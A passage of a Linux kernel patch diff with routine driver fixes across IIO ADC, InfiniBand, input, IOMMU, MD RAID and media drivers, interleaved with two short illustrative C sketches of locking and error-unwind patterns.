+ 	struct ad9467_state *st = adi_axi_adc_conv_priv(conv);
+@@ -378,6 +426,21 @@ static int ad9467_preenable_setup(struct adi_axi_adc_conv *conv)
+ 	return ad9467_outputmode_set(st->spi, st->output_mode);
+ }
+ 
++static int ad9467_reset(struct device *dev)
++{
++	struct gpio_desc *gpio;
++
++	gpio = devm_gpiod_get_optional(dev, "reset", GPIOD_OUT_HIGH);
++	if (IS_ERR_OR_NULL(gpio))
++		return PTR_ERR_OR_ZERO(gpio);
++
++	fsleep(1);
++	gpiod_set_value_cansleep(gpio, 0);
++	fsleep(10 * USEC_PER_MSEC);
++
++	return 0;
++}
++
+ static int ad9467_probe(struct spi_device *spi)
+ {
+ 	const struct ad9467_chip_info *info;
+@@ -406,21 +469,16 @@ static int ad9467_probe(struct spi_device *spi)
+ 	if (IS_ERR(st->pwrdown_gpio))
+ 		return PTR_ERR(st->pwrdown_gpio);
+ 
+-	st->reset_gpio = devm_gpiod_get_optional(&spi->dev, "reset",
+-						 GPIOD_OUT_LOW);
+-	if (IS_ERR(st->reset_gpio))
+-		return PTR_ERR(st->reset_gpio);
+-
+-	if (st->reset_gpio) {
+-		udelay(1);
+-		ret = gpiod_direction_output(st->reset_gpio, 1);
+-		if (ret)
+-			return ret;
+-		mdelay(10);
+-	}
++	ret = ad9467_reset(&spi->dev);
++	if (ret)
++		return ret;
+ 
+ 	conv->chip_info = &info->axi_adc_info;
+ 
++	ret = ad9467_scale_fill(conv);
++	if (ret)
++		return ret;
++
+ 	id = ad9467_spi_read(spi, AN877_ADC_REG_CHIP_ID);
+ 	if (id != conv->chip_info->id) {
+ 		dev_err(&spi->dev, "Mismatch CHIP_ID, got 0x%X, expected 0x%X\n",
+@@ -431,6 +489,7 @@ static int ad9467_probe(struct spi_device *spi)
+ 	conv->reg_access = ad9467_reg_access;
+ 	conv->write_raw = ad9467_write_raw;
+ 	conv->read_raw = ad9467_read_raw;
++	conv->read_avail = ad9467_read_avail;
+ 	conv->preenable_setup = ad9467_preenable_setup;
+ 
+ 	st->output_mode = info->default_output_mode |
+diff --git a/drivers/iio/adc/adi-axi-adc.c b/drivers/iio/adc/adi-axi-adc.c
+index e8a8ea4140f16..ad386ac7f03cb 100644
+--- a/drivers/iio/adc/adi-axi-adc.c
++++ b/drivers/iio/adc/adi-axi-adc.c
+@@ -143,6 +143,20 @@ static int adi_axi_adc_write_raw(struct iio_dev *indio_dev,
+ 	return conv->write_raw(conv, chan, val, val2, mask);
+ }
+ 
++static int adi_axi_adc_read_avail(struct iio_dev *indio_dev,
++				  struct iio_chan_spec const *chan,
++				  const int **vals, int *type, int *length,
++				  long mask)
++{
++	struct adi_axi_adc_state *st = iio_priv(indio_dev);
++	struct adi_axi_adc_conv *conv = &st->client->conv;
++
++	if (!conv->read_avail)
++		return -EOPNOTSUPP;
++
++	return conv->read_avail(conv, chan, vals, type, length, mask);
++}
++
+ static int adi_axi_adc_update_scan_mode(struct iio_dev *indio_dev,
+ 					const unsigned long *scan_mask)
+ {
+@@ -227,69 +241,11 @@ struct adi_axi_adc_conv *devm_adi_axi_adc_conv_register(struct device *dev,
+ }
+ EXPORT_SYMBOL_NS_GPL(devm_adi_axi_adc_conv_register, IIO_ADI_AXI);
+ 
+-static ssize_t in_voltage_scale_available_show(struct device *dev,
+-					       struct device_attribute *attr,
+-					       char *buf)
+-{
+-	struct iio_dev *indio_dev = dev_to_iio_dev(dev);
+-	struct adi_axi_adc_state *st = iio_priv(indio_dev);
+-	struct adi_axi_adc_conv *conv = &st->client->conv;
+-	size_t len = 0;
+-	int i;
+-
+-	for (i = 0; i < conv->chip_info->num_scales; i++) {
+-		const unsigned int *s = conv->chip_info->scale_table[i];
+-
+-		len += scnprintf(buf + len, PAGE_SIZE - len,
+-				 "%u.%06u ", s[0], s[1]);
+-	}
+-	buf[len - 1] = '\n';
+-
+-	return len;
+-}
+-
+-static IIO_DEVICE_ATTR_RO(in_voltage_scale_available, 0);
+-
+-enum {
+-	ADI_AXI_ATTR_SCALE_AVAIL,
+-};
+-
+-#define ADI_AXI_ATTR(_en_, _file_)			\
+-	[ADI_AXI_ATTR_##_en_] = &iio_dev_attr_##_file_.dev_attr.attr
+-
+-static struct attribute *adi_axi_adc_attributes[] = {
+-	ADI_AXI_ATTR(SCALE_AVAIL, in_voltage_scale_available),
+-	NULL
+-};
+-
+-static umode_t axi_adc_attr_is_visible(struct kobject *kobj,
+-				       struct attribute *attr, int n)
+-{
+-	struct device *dev = kobj_to_dev(kobj);
+-	struct iio_dev *indio_dev = dev_to_iio_dev(dev);
+-	struct adi_axi_adc_state *st = iio_priv(indio_dev);
+-	struct adi_axi_adc_conv *conv = &st->client->conv;
+-
+-	switch (n) {
+-	case ADI_AXI_ATTR_SCALE_AVAIL:
+-		if (!conv->chip_info->num_scales)
+-			return 0;
+-		return attr->mode;
+-	default:
+-		return attr->mode;
+-	}
+-}
+-
+-static const struct attribute_group adi_axi_adc_attribute_group = {
+-	.attrs = adi_axi_adc_attributes,
+-	.is_visible = axi_adc_attr_is_visible,
+-};
+-
+ static const struct iio_info adi_axi_adc_info = {
+ 	.read_raw = &adi_axi_adc_read_raw,
+ 	.write_raw = &adi_axi_adc_write_raw,
+-	.attrs = &adi_axi_adc_attribute_group,
+ 	.update_scan_mode = &adi_axi_adc_update_scan_mode,
++	.read_avail = &adi_axi_adc_read_avail,
+ };
+ 
+ static const struct adi_axi_adc_core_info adi_axi_adc_10_0_a_info = {
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index c2ee80546d120..58fbb1d3b7f41 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -2819,6 +2819,10 @@ static int free_mr_alloc_res(struct hns_roce_dev *hr_dev)
+ 	return 0;
+ 
+ create_failed_qp:
++	for (i--; i >= 0; i--) {
++		hns_roce_v2_destroy_qp(&free_mr->rsv_qp[i]->ibqp, NULL);
++		kfree(free_mr->rsv_qp[i]);
++	}
+ 	hns_roce_destroy_cq(cq, NULL);
+ 	kfree(cq);
+ 
+@@ -5791,7 +5795,7 @@ static int hns_roce_v2_modify_srq(struct ib_srq *ibsrq,
+ 
+ 	/* Resizing SRQs is not supported yet */
+ 	if (srq_attr_mask & IB_SRQ_MAX_WR)
+-		return -EINVAL;
++		return -EOPNOTSUPP;
+ 
+ 	if (srq_attr_mask & IB_SRQ_LIMIT) {
+ 		if (srq_attr->srq_limit > srq->wqe_cnt)
+diff --git a/drivers/infiniband/hw/hns/hns_roce_pd.c b/drivers/infiniband/hw/hns/hns_roce_pd.c
+index 783e71852c503..bd1fe89ca205e 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_pd.c
++++ b/drivers/infiniband/hw/hns/hns_roce_pd.c
+@@ -150,7 +150,7 @@ int hns_roce_alloc_xrcd(struct ib_xrcd *ib_xrcd, struct ib_udata *udata)
+ 	int ret;
+ 
+ 	if (!(hr_dev->caps.flags & HNS_ROCE_CAP_FLAG_XRC))
+-		return -EINVAL;
++		return -EOPNOTSUPP;
+ 
+ 	ret = hns_roce_xrcd_alloc(hr_dev, &xrcd->xrcdn);
+ 	if (ret)
+diff --git a/drivers/infiniband/hw/mthca/mthca_cmd.c b/drivers/infiniband/hw/mthca/mthca_cmd.c
+index f330ce895d884..8fe0cef7e2be6 100644
+--- a/drivers/infiniband/hw/mthca/mthca_cmd.c
++++ b/drivers/infiniband/hw/mthca/mthca_cmd.c
+@@ -635,7 +635,7 @@ void mthca_free_mailbox(struct mthca_dev *dev, struct mthca_mailbox *mailbox)
+ 
+ int mthca_SYS_EN(struct mthca_dev *dev)
+ {
+-	u64 out;
++	u64 out = 0;
+ 	int ret;
+ 
+ 	ret = mthca_cmd_imm(dev, 0, &out, 0, 0, CMD_SYS_EN, CMD_TIME_CLASS_D);
+@@ -1955,7 +1955,7 @@ int mthca_WRITE_MGM(struct mthca_dev *dev, int index,
+ int mthca_MGID_HASH(struct mthca_dev *dev, struct mthca_mailbox *mailbox,
+ 		    u16 *hash)
+ {
+-	u64 imm;
++	u64 imm = 0;
+ 	int err;
+ 
+ 	err = mthca_cmd_imm(dev, mailbox->dma, &imm, 0, 0, CMD_MGID_HASH,
+diff --git a/drivers/infiniband/hw/mthca/mthca_main.c b/drivers/infiniband/hw/mthca/mthca_main.c
+index b54bc8865daec..1ab268b770968 100644
+--- a/drivers/infiniband/hw/mthca/mthca_main.c
++++ b/drivers/infiniband/hw/mthca/mthca_main.c
+@@ -382,7 +382,7 @@ static int mthca_init_icm(struct mthca_dev *mdev,
+ 			  struct mthca_init_hca_param *init_hca,
+ 			  u64 icm_size)
+ {
+-	u64 aux_pages;
++	u64 aux_pages = 0;
+ 	int err;
+ 
+ 	err = mthca_SET_ICM_SIZE(mdev, icm_size, &aux_pages);
+diff --git a/drivers/infiniband/ulp/iser/iscsi_iser.h b/drivers/infiniband/ulp/iser/iscsi_iser.h
+index dee8c97ff0568..d967d55324596 100644
+--- a/drivers/infiniband/ulp/iser/iscsi_iser.h
++++ b/drivers/infiniband/ulp/iser/iscsi_iser.h
+@@ -317,12 +317,10 @@ struct iser_device {
+  *
+  * @mr:         memory region
+  * @sig_mr:     signature memory region
+- * @mr_valid:   is mr valid indicator
+  */
+ struct iser_reg_resources {
+ 	struct ib_mr                     *mr;
+ 	struct ib_mr                     *sig_mr;
+-	u8				  mr_valid:1;
+ };
+ 
+ /**
+diff --git a/drivers/infiniband/ulp/iser/iser_initiator.c b/drivers/infiniband/ulp/iser/iser_initiator.c
+index 7b83f48f60c5e..8ec470c519e82 100644
+--- a/drivers/infiniband/ulp/iser/iser_initiator.c
++++ b/drivers/infiniband/ulp/iser/iser_initiator.c
+@@ -580,7 +580,10 @@ static inline int iser_inv_desc(struct iser_fr_desc *desc, u32 rkey)
+ 		return -EINVAL;
+ 	}
+ 
+-	desc->rsc.mr_valid = 0;
++	if (desc->sig_protected)
++		desc->rsc.sig_mr->need_inval = false;
++	else
++		desc->rsc.mr->need_inval = false;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/infiniband/ulp/iser/iser_memory.c b/drivers/infiniband/ulp/iser/iser_memory.c
+index 29ae2c6a250a3..6efcb79c8efe3 100644
+--- a/drivers/infiniband/ulp/iser/iser_memory.c
++++ b/drivers/infiniband/ulp/iser/iser_memory.c
+@@ -264,7 +264,7 @@ static int iser_reg_sig_mr(struct iscsi_iser_task *iser_task,
+ 
+ 	iser_set_prot_checks(iser_task->sc, &sig_attrs->check_mask);
+ 
+-	if (rsc->mr_valid)
++	if (rsc->sig_mr->need_inval)
+ 		iser_inv_rkey(&tx_desc->inv_wr, mr, cqe, &wr->wr);
+ 
+ 	ib_update_fast_reg_key(mr, ib_inc_rkey(mr->rkey));
+@@ -288,7 +288,7 @@ static int iser_reg_sig_mr(struct iscsi_iser_task *iser_task,
+ 	wr->access = IB_ACCESS_LOCAL_WRITE |
+ 		     IB_ACCESS_REMOTE_READ |
+ 		     IB_ACCESS_REMOTE_WRITE;
+-	rsc->mr_valid = 1;
++	rsc->sig_mr->need_inval = true;
+ 
+ 	sig_reg->sge.lkey = mr->lkey;
+ 	sig_reg->rkey = mr->rkey;
+@@ -313,7 +313,7 @@ static int iser_fast_reg_mr(struct iscsi_iser_task *iser_task,
+ 	struct ib_reg_wr *wr = &tx_desc->reg_wr;
+ 	int n;
+ 
+-	if (rsc->mr_valid)
++	if (rsc->mr->need_inval)
+ 		iser_inv_rkey(&tx_desc->inv_wr, mr, cqe, &wr->wr);
+ 
+ 	ib_update_fast_reg_key(mr, ib_inc_rkey(mr->rkey));
+@@ -336,7 +336,7 @@ static int iser_fast_reg_mr(struct iscsi_iser_task *iser_task,
+ 		     IB_ACCESS_REMOTE_WRITE |
+ 		     IB_ACCESS_REMOTE_READ;
+ 
+-	rsc->mr_valid = 1;
++	rsc->mr->need_inval = true;
+ 
+ 	reg->sge.lkey = mr->lkey;
+ 	reg->rkey = mr->rkey;
+diff --git a/drivers/infiniband/ulp/iser/iser_verbs.c b/drivers/infiniband/ulp/iser/iser_verbs.c
+index a00ca117303a9..057e69164e6d7 100644
+--- a/drivers/infiniband/ulp/iser/iser_verbs.c
++++ b/drivers/infiniband/ulp/iser/iser_verbs.c
+@@ -135,7 +135,6 @@ iser_create_fastreg_desc(struct iser_device *device,
+ 			goto err_alloc_mr_integrity;
+ 		}
+ 	}
+-	desc->rsc.mr_valid = 0;
+ 
+ 	return desc;
+ 
+diff --git a/drivers/input/keyboard/atkbd.c b/drivers/input/keyboard/atkbd.c
+index e1e4f1133296a..c4d8caadec59e 100644
+--- a/drivers/input/keyboard/atkbd.c
++++ b/drivers/input/keyboard/atkbd.c
+@@ -772,9 +772,9 @@ static bool atkbd_is_portable_device(void)
+  * not work. So in this case simply assume a keyboard is connected to avoid
+  * confusing some laptop keyboards.
+  *
+- * Skipping ATKBD_CMD_GETID ends up using a fake keyboard id. Using a fake id is
+- * ok in translated mode, only atkbd_select_set() checks atkbd->id and in
+- * translated mode that is a no-op.
++ * Skipping ATKBD_CMD_GETID ends up using a fake keyboard id. Using the standard
++ * 0xab83 id is ok in translated mode, only atkbd_select_set() checks atkbd->id
++ * and in translated mode that is a no-op.
+  */
+ static bool atkbd_skip_getid(struct atkbd *atkbd)
+ {
+@@ -792,6 +792,7 @@ static int atkbd_probe(struct atkbd *atkbd)
+ {
+ 	struct ps2dev *ps2dev = &atkbd->ps2dev;
+ 	unsigned char param[2];
++	bool skip_getid;
+ 
+ /*
+  * Some systems, where the bit-twiddling when testing the io-lines of the
+@@ -813,7 +814,8 @@ static int atkbd_probe(struct atkbd *atkbd)
+  */
+ 
+ 	param[0] = param[1] = 0xa5;	/* initialize with invalid values */
+-	if (atkbd_skip_getid(atkbd) || ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
++	skip_getid = atkbd_skip_getid(atkbd);
++	if (skip_getid || ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
+ 
+ /*
+  * If the get ID command was skipped or failed, we check if we can at least set
+@@ -823,7 +825,7 @@ static int atkbd_probe(struct atkbd *atkbd)
+ 		param[0] = 0;
+ 		if (ps2_command(ps2dev, param, ATKBD_CMD_SETLEDS))
+ 			return -1;
+-		atkbd->id = 0xabba;
++		atkbd->id = skip_getid ? 0xab83 : 0xabba;
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c b/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
+index b2708de25ea34..d80065c8105af 100644
+--- a/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
++++ b/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
+@@ -243,6 +243,7 @@ static int qcom_adreno_smmu_init_context(struct arm_smmu_domain *smmu_domain,
+ 
+ static const struct of_device_id qcom_smmu_client_of_match[] __maybe_unused = {
+ 	{ .compatible = "qcom,adreno" },
++	{ .compatible = "qcom,adreno-gmu" },
+ 	{ .compatible = "qcom,mdp4" },
+ 	{ .compatible = "qcom,mdss" },
+ 	{ .compatible = "qcom,sc7180-mdss" },
+diff --git a/drivers/iommu/dma-iommu.c b/drivers/iommu/dma-iommu.c
+index 9297b741f5e80..aa6d62cc567ae 100644
+--- a/drivers/iommu/dma-iommu.c
++++ b/drivers/iommu/dma-iommu.c
+@@ -28,6 +28,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/swiotlb.h>
+ #include <linux/vmalloc.h>
++#include <trace/events/swiotlb.h>
+ 
+ #include "dma-iommu.h"
+ 
+@@ -999,6 +1000,8 @@ static dma_addr_t iommu_dma_map_page(struct device *dev, struct page *page,
+ 			return DMA_MAPPING_ERROR;
+ 		}
+ 
++		trace_swiotlb_bounced(dev, phys, size);
++
+ 		aligned_size = iova_align(iovad, size);
+ 		phys = swiotlb_tbl_map_single(dev, phys, size, aligned_size,
+ 					      iova_mask(iovad), dir, attrs);
+diff --git a/drivers/leds/Kconfig b/drivers/leds/Kconfig
+index 2378cfb7443e4..509d03eb3e8d6 100644
+--- a/drivers/leds/Kconfig
++++ b/drivers/leds/Kconfig
+@@ -97,6 +97,7 @@ config LEDS_ARIEL
+ config LEDS_AW2013
+ 	tristate "LED support for Awinic AW2013"
+ 	depends on LEDS_CLASS && I2C && OF
++	select REGMAP_I2C
+ 	help
+ 	  This option enables support for the AW2013 3-channel
+ 	  LED driver.
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 0c2801d770901..6120f26a79696 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -528,6 +528,9 @@ static void md_end_flush(struct bio *bio)
+ 	rdev_dec_pending(rdev, mddev);
+ 
+ 	if (atomic_dec_and_test(&mddev->flush_pending)) {
++		/* This pairs with percpu_ref_get() in md_flush_request() */
++		percpu_ref_put(&mddev->active_io);
++
+ 		/* The pre-request flush has finished */
+ 		queue_work(md_wq, &mddev->flush_work);
+ 	}
+@@ -547,12 +550,8 @@ static void submit_flushes(struct work_struct *ws)
+ 	rdev_for_each_rcu(rdev, mddev)
+ 		if (rdev->raid_disk >= 0 &&
+ 		    !test_bit(Faulty, &rdev->flags)) {
+-			/* Take two references, one is dropped
+-			 * when request finishes, one after
+-			 * we reclaim rcu_read_lock
+-			 */
+ 			struct bio *bi;
+-			atomic_inc(&rdev->nr_pending);
++
+ 			atomic_inc(&rdev->nr_pending);
+ 			rcu_read_unlock();
+ 			bi = bio_alloc_bioset(rdev->bdev, 0,
+@@ -563,7 +562,6 @@ static void submit_flushes(struct work_struct *ws)
+ 			atomic_inc(&mddev->flush_pending);
+ 			submit_bio(bi);
+ 			rcu_read_lock();
+-			rdev_dec_pending(rdev, mddev);
+ 		}
+ 	rcu_read_unlock();
+ 	if (atomic_dec_and_test(&mddev->flush_pending))
+@@ -616,6 +614,18 @@ bool md_flush_request(struct mddev *mddev, struct bio *bio)
+ 	/* new request after previous flush is completed */
+ 	if (ktime_after(req_start, mddev->prev_flush_start)) {
+ 		WARN_ON(mddev->flush_bio);
++		/*
++		 * Grab a reference to make sure mddev_suspend() will wait for
++		 * this flush to be done.
++		 *
++		 * md_flush_request() is called under md_handle_request() and
++		 * 'active_io' is already grabbed, hence percpu_ref_is_zero()
++		 * won't pass, percpu_ref_tryget_live() can't be used because
++		 * percpu_ref_kill() can be called by mddev_suspend()
++		 * concurrently.
++		 */
++		WARN_ON(percpu_ref_is_zero(&mddev->active_io));
++		percpu_ref_get(&mddev->active_io);
+ 		mddev->flush_bio = bio;
+ 		bio = NULL;
+ 	}
+diff --git a/drivers/md/raid1.c b/drivers/md/raid1.c
+index 30f906a67def4..76f7ca53d8123 100644
+--- a/drivers/md/raid1.c
++++ b/drivers/md/raid1.c
+@@ -1972,12 +1972,12 @@ static void end_sync_write(struct bio *bio)
+ }
+ 
+ static int r1_sync_page_io(struct md_rdev *rdev, sector_t sector,
+-			   int sectors, struct page *page, int rw)
++			   int sectors, struct page *page, blk_opf_t rw)
+ {
+ 	if (sync_page_io(rdev, sector, sectors << 9, page, rw, false))
+ 		/* success */
+ 		return 1;
+-	if (rw == WRITE) {
++	if (rw == REQ_OP_WRITE) {
+ 		set_bit(WriteErrorSeen, &rdev->flags);
+ 		if (!test_and_set_bit(WantReplacement,
+ 				      &rdev->flags))
+@@ -2094,7 +2094,7 @@ static int fix_sync_read_error(struct r1bio *r1_bio)
+ 			rdev = conf->mirrors[d].rdev;
+ 			if (r1_sync_page_io(rdev, sect, s,
+ 					    pages[idx],
+-					    WRITE) == 0) {
++					    REQ_OP_WRITE) == 0) {
+ 				r1_bio->bios[d]->bi_end_io = NULL;
+ 				rdev_dec_pending(rdev, mddev);
+ 			}
+@@ -2109,7 +2109,7 @@ static int fix_sync_read_error(struct r1bio *r1_bio)
+ 			rdev = conf->mirrors[d].rdev;
+ 			if (r1_sync_page_io(rdev, sect, s,
+ 					    pages[idx],
+-					    READ) != 0)
++					    REQ_OP_READ) != 0)
+ 				atomic_add(s, &rdev->corrected_errors);
+ 		}
+ 		sectors -= s;
+@@ -2321,7 +2321,7 @@ static void fix_read_error(struct r1conf *conf, int read_disk,
+ 				atomic_inc(&rdev->nr_pending);
+ 				rcu_read_unlock();
+ 				r1_sync_page_io(rdev, sect, s,
+-						conf->tmppage, WRITE);
++						conf->tmppage, REQ_OP_WRITE);
+ 				rdev_dec_pending(rdev, mddev);
+ 			} else
+ 				rcu_read_unlock();
+@@ -2338,7 +2338,7 @@ static void fix_read_error(struct r1conf *conf, int read_disk,
+ 				atomic_inc(&rdev->nr_pending);
+ 				rcu_read_unlock();
+ 				if (r1_sync_page_io(rdev, sect, s,
+-						    conf->tmppage, READ)) {
++						conf->tmppage, REQ_OP_READ)) {
+ 					atomic_add(s, &rdev->corrected_errors);
+ 					pr_info("md/raid1:%s: read error corrected (%d sectors at %llu on %pg)\n",
+ 						mdname(mddev), s,
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index f7783199f81d4..e4564ca1f2434 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -36,6 +36,7 @@
+  */
+ 
+ #include <linux/blkdev.h>
++#include <linux/delay.h>
+ #include <linux/kthread.h>
+ #include <linux/raid/pq.h>
+ #include <linux/async_tx.h>
+@@ -6832,7 +6833,18 @@ static void raid5d(struct md_thread *thread)
+ 			spin_unlock_irq(&conf->device_lock);
+ 			md_check_recovery(mddev);
+ 			spin_lock_irq(&conf->device_lock);
++
++			/*
++			 * Waiting on MD_SB_CHANGE_PENDING below may deadlock,
++			 * since md_check_recovery() is needed to clear
++			 * the flag when using mdmon.
++			 */
++			continue;
+ 		}
++
++		wait_event_lock_irq(mddev->sb_wait,
++			!test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags),
++			conf->device_lock);
+ 	}
+ 	pr_debug("%d stripes handled\n", handled);
+ 
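For readers unfamiliar with wait_event_lock_irq(): it sleeps until the predicate becomes true, dropping the given spinlock while asleep and reacquiring it before each recheck — which is why raid5d must first `continue` and give md_check_recovery() another chance to clear MD_SB_CHANGE_PENDING. A rough pthread analogue of that contract (condition variable standing in for the kernel primitive; names are illustrative):

#include <pthread.h>
#include <stdbool.h>
#include <unistd.h>

static pthread_mutex_t device_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t  sb_wait     = PTHREAD_COND_INITIALIZER;
static bool sb_change_pending = true;      /* MD_SB_CHANGE_PENDING stand-in */

static void wait_event_lock(void)          /* call with device_lock held */
{
	while (sb_change_pending)          /* recheck with the lock held */
		pthread_cond_wait(&sb_wait, &device_lock); /* drops + retakes */
}

static void *recovery_thread(void *arg)    /* md_check_recovery()/mdmon role */
{
	(void)arg;
	usleep(1000);
	pthread_mutex_lock(&device_lock);
	sb_change_pending = false;         /* clear the flag... */
	pthread_cond_broadcast(&sb_wait);  /* ...and wake the waiter */
	pthread_mutex_unlock(&device_lock);
	return NULL;
}

int main(void)
{
	pthread_t t;
	pthread_create(&t, NULL, recovery_thread, NULL);
	pthread_mutex_lock(&device_lock);
	wait_event_lock();                 /* returns only once the flag clears */
	pthread_mutex_unlock(&device_lock);
	pthread_join(t, NULL);
	return 0;
}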
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index 9f9a976527080..d352e028491aa 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -104,6 +104,8 @@ static int dvb_device_open(struct inode *inode, struct file *file)
+ 			err = file->f_op->open(inode, file);
+ 		up_read(&minor_rwsem);
+ 		mutex_unlock(&dvbdev_mutex);
++		if (err)
++			dvb_device_put(dvbdev);
+ 		return err;
+ 	}
+ fail:
+diff --git a/drivers/media/dvb-frontends/m88ds3103.c b/drivers/media/dvb-frontends/m88ds3103.c
+index 9a0d43c7ba9e0..ce99f7dfb5a5e 100644
+--- a/drivers/media/dvb-frontends/m88ds3103.c
++++ b/drivers/media/dvb-frontends/m88ds3103.c
+@@ -1894,7 +1894,7 @@ static int m88ds3103_probe(struct i2c_client *client,
+ 		/* get frontend address */
+ 		ret = regmap_read(dev->regmap, 0x29, &utmp);
+ 		if (ret)
+-			goto err_kfree;
++			goto err_del_adapters;
+ 		dev->dt_addr = ((utmp & 0x80) == 0) ? 0x42 >> 1 : 0x40 >> 1;
+ 		dev_dbg(&client->dev, "dt addr is 0x%02x\n", dev->dt_addr);
+ 
+@@ -1902,11 +1902,14 @@ static int m88ds3103_probe(struct i2c_client *client,
+ 						      dev->dt_addr);
+ 		if (IS_ERR(dev->dt_client)) {
+ 			ret = PTR_ERR(dev->dt_client);
+-			goto err_kfree;
++			goto err_del_adapters;
+ 		}
+ 	}
+ 
+ 	return 0;
++
++err_del_adapters:
++	i2c_mux_del_adapters(dev->muxc);
+ err_kfree:
+ 	kfree(dev);
+ err:
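The fix above restores the usual kernel error-unwind idiom: each later failure jumps to a label that releases everything acquired so far, in reverse order, so the newly registered mux adapters are torn down before the kfree(). A compressed userspace sketch of the pattern (resource names are hypothetical):

#include <stdio.h>
#include <stdlib.h>

static int acquire(const char *name, int fail)
{
	printf("acquire %s\n", name);
	return fail ? -1 : 0;
}

static int probe(int fail_late)
{
	char *dev;
	int ret;

	dev = malloc(64);                 /* kzalloc() analogue */
	if (!dev)
		return -1;

	ret = acquire("mux adapters", 0); /* i2c mux registration analogue */
	if (ret)
		goto err_kfree;           /* nothing beyond dev to undo yet */

	ret = acquire("frontend", fail_late);
	if (ret)
		goto err_del_adapters;    /* must undo the mux first */

	return 0;

err_del_adapters:
	puts("release mux adapters");     /* i2c_mux_del_adapters() analogue */
err_kfree:
	free(dev);
	return ret;
}

int main(void)
{
	return probe(1) == -1 ? 0 : 1;    /* exercise the late-failure path */
}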
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+index e9a4f8abd21c5..3071b61946c3b 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+@@ -1412,7 +1412,6 @@ static int mtk_jpeg_remove(struct platform_device *pdev)
+ {
+ 	struct mtk_jpeg_dev *jpeg = platform_get_drvdata(pdev);
+ 
+-	cancel_delayed_work_sync(&jpeg->job_timeout_work);
+ 	pm_runtime_disable(&pdev->dev);
+ 	video_unregister_device(jpeg->vdev);
+ 	v4l2_m2m_release(jpeg->m2m_dev);
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_dec_hw.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_dec_hw.c
+index afbbfd5d02bcc..6d200e23754e8 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_dec_hw.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_dec_hw.c
+@@ -188,6 +188,7 @@ int mtk_jpeg_dec_fill_param(struct mtk_jpeg_dec_param *param)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_fill_param);
+ 
+ u32 mtk_jpeg_dec_get_int_status(void __iomem *base)
+ {
+@@ -199,6 +200,7 @@ u32 mtk_jpeg_dec_get_int_status(void __iomem *base)
+ 
+ 	return ret;
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_get_int_status);
+ 
+ u32 mtk_jpeg_dec_enum_result(u32 irq_result)
+ {
+@@ -215,11 +217,13 @@ u32 mtk_jpeg_dec_enum_result(u32 irq_result)
+ 
+ 	return MTK_JPEG_DEC_RESULT_ERROR_UNKNOWN;
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_enum_result);
+ 
+ void mtk_jpeg_dec_start(void __iomem *base)
+ {
+ 	writel(0, base + JPGDEC_REG_TRIG);
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_start);
+ 
+ static void mtk_jpeg_dec_soft_reset(void __iomem *base)
+ {
+@@ -239,6 +243,7 @@ void mtk_jpeg_dec_reset(void __iomem *base)
+ 	mtk_jpeg_dec_soft_reset(base);
+ 	mtk_jpeg_dec_hard_reset(base);
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_reset);
+ 
+ static void mtk_jpeg_dec_set_brz_factor(void __iomem *base, u8 yscale_w,
+ 					u8 yscale_h, u8 uvscale_w, u8 uvscale_h)
+@@ -407,3 +412,4 @@ void mtk_jpeg_dec_set_config(void __iomem *base,
+ 				   config->dma_last_mcu);
+ 	mtk_jpeg_dec_set_pause_mcu_idx(base, config->total_mcu);
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_set_config);
+diff --git a/drivers/media/platform/nxp/imx-mipi-csis.c b/drivers/media/platform/nxp/imx-mipi-csis.c
+index 905072871ed2e..196f2bba419f9 100644
+--- a/drivers/media/platform/nxp/imx-mipi-csis.c
++++ b/drivers/media/platform/nxp/imx-mipi-csis.c
+@@ -1553,8 +1553,10 @@ static int mipi_csis_remove(struct platform_device *pdev)
+ 	v4l2_async_nf_cleanup(&csis->notifier);
+ 	v4l2_async_unregister_subdev(&csis->sd);
+ 
++	if (!pm_runtime_enabled(&pdev->dev))
++		mipi_csis_runtime_suspend(&pdev->dev);
++
+ 	pm_runtime_disable(&pdev->dev);
+-	mipi_csis_runtime_suspend(&pdev->dev);
+ 	mipi_csis_clk_disable(csis);
+ 	media_entity_cleanup(&csis->sd.entity);
+ 	fwnode_handle_put(csis->sd.fwnode);
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+index f2475c6235ea7..2b76339f9381c 100644
